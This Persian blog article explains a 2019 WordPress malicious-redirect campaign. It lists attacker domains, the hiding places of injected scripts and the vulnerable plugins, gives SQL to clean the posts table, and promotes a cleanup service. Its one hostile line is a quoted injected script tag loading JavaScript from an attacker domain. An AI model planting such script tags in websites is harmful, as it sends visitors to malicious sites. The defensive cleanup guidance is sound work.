در هفته‌های اخیر حملاتی به سایت‌های وردپرس انجام می‌شود که موجب ریدایرکت شدن وردپرس هک شده به سمت چند دامنه خارجی هدایت می‌کنند.به این حملات که با هدف ریدایرکت وردپرس انجام می‌شود حملات Malware Redirects یا Spam Weiterleitungen گفته می‌شود در این مقاله چگونگی وقوع و انجام این حملات را بررسی خواهیم کرد، البته با توجه به اینکه این حملات  به طور منظم اتفاق نمی‌افتد ممکن است این نوع از هک وردپرس برای زمان طولانی کشف نشود.

بسیار مهم است که بدانیم دامنه‌های ns1.bullgoesdown.com و js.wiilberedmodels.com در حال حاضر بیشترین هدف اسکریپ‌های تزریق شده و مسیرهای ریدایرکت هستند.لیست کامل دامنه‌هایی که نشان‌دهنده آلودگی و هک شدن وردپرس هستند(سپتامبر 2019):

• wiilberedmodels.com
• bullgoesdown.com
• greatinstagrampage.com
• gabriellalovecats.com
• jackielovedogs.com
• tomorrowwillbehotmaybe.com
• activeandbanflip.com
• developsincelock.com
• blueeyeswebsite.com

ریدایرکت اسپم وردپرس – مکان مخفی شدن احتمالی

در حقیقت تغییر مسیر (ریدایرکت) اتوماتیک می‌تواند در هر فایلی که توسط سیستم وردپرس بارگذاری شود -داخلی یا خارجی- قابل اجرا باشد، علاوه بر این تزریق اسکریپت اغلب به طور مستقیم در دیتابیس (بانک اطلاعاتی) هم اتفاق می‌افتد.

برخی مکان‌هایی که امکان مخفی شدن اسکریپ‌ها و اسپم‌های ریدایرکت در آن وجود دارد:

• تزریق جاوااسکریپت در فایل‌های PHP
• تغییر و ویرایش فایل‌های JS
• تزریق اسکریپت در نوشته و برگه (دیتابیس)
• تزریق اسکریپت در ابزارک (دیتابیس)
• تغییر و ویرایش فایل .htaccess
• شبکه‌های تبلیغاتی (سرورهای تبلیغاتی هک شده)

پاک‌سازی جدول wp_content از طریق phpMyAdmin

یک تزریق معمولی که در همه نوشته‌های وردپرس یافت می‌شود:

<script src="https://jackielovedogs.com/pret.js?l=1&amp;" type="text / javascript"> </ script>

با استفاده از دستور SQL زیر می‌توان این اسکریپت را حذف کرد:

UPDATE `wp_posts` SET post_content = REPLACE (post_content," <script src = "https://jackielovedogs.com/pret.js?l=1&" language = "javascript" type = "text / javascript"> </ script> "," ");

در صورت لزوم، شما باید پیشوند جداول وردپرس را از _wp به پیشوند شخصی دلخواه خود تغییر دهید.

از بین بردن حفره‌های امنیتی

دلیل اصلی هک شدن سایت‌های وردپرس ، استفاده از نسخه‌های قدیمی و منسوخ شده است.هسته وردپرس و پلاگین‌های آن باید به طور منظم به‌روزرسانی شوند.کمپین ریدایرکت فعلی (Malicious Redirect) به افزونه‌های زیر حمله می‌کند که در نسخه‌های قدیمی خود آسیب‌پذیر هستند:

• Advanced Access Manager
  Bold Page Builder
  Blog designer
  Live Chat with Facebook Messenger
  Yuzo Related Posts
  Visual CSS style editor
  WP Live Chat Support
  Shape Lightbox
  Hybrid Composer
  Woocommerce User Email Verification
  Yellow Pencil Visual Theme Customizer
  Coming Soon and Maintenance Mode
  All NicDark plugins

در مورد حملات Malicious WordPress Redirect Campaign مقالات زیادی در وب یافت می‌شود که می‌توان به مقاله سایت wordfence اشاره نمود؛ همچنین برای افزایش امنیت وردپرس و پیشگیری و رفع حملات ریدایرکت وردپرس، می‌توانید از سرویس راه‌اندازی وردپرس هک شده در سایت افزون استفاده نمائید.